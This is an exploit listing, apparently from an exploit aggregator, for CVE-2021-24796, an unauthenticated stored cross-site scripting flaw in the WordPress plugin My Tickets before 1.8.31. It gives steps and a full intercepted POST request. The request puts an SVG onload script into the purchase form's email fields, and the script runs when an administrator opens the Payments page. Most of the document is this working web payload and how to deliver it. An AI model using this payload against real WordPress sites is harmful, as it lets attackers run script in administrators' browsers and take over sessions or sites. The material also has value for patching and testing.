Exploit for My Tickets < 1.8.31 - Unauthenticated Stored Cross-Site Scripting CVE-2021-24796

Name: Exploit for My Tickets < 1.8.31 - Unauthenticated Stored Cross-Site Scripting CVE-2021-24796
Rating: 5 (223 reviews)

2021-10-18 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:D973DC0F-3CB4-408D-A8B0-01ABEB9EF951
As unauthenticated, book a ticket, fill the purchase form with dummy data and intercept it to change the email address (which is validated client side but not server side) to something like <svg/onload=alert(/XSS/)>

POST /purchase/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 413
Origin: http://wp.lab
Connection: close
Cookie: mt_unique_id=-KFPBzwr-0Y2BZ1a
Upgrade-Insecure-Requests: 1

_wpnonce=97e4184df7&mt_gateway=offline&mt_cart_order%5B1950%5D%5Badult%5D%5Bcount%5D=1&mt_cart_order%5B1950%5D%5Badult%5D%5Bprice%5D=1.00&mt_cart_order%5B1950%5D%5Badult%5D%5Borig_price%5D=1&mt_fname=XSS&mt_lname=swd&mt_email=<svg/onload=alert(/XSS/)>&mt_email2=<svg/onload=alert(/XSS/)>&ticketing_method=printable&mt_submit=Review+cart+and+make+payment&my-tickets=true

Then confirm the Reservation. The XSS will be triggered when an admin view the Payments page in the admin dashboard (/wp-admin/edit.php?post_type=mt-payments)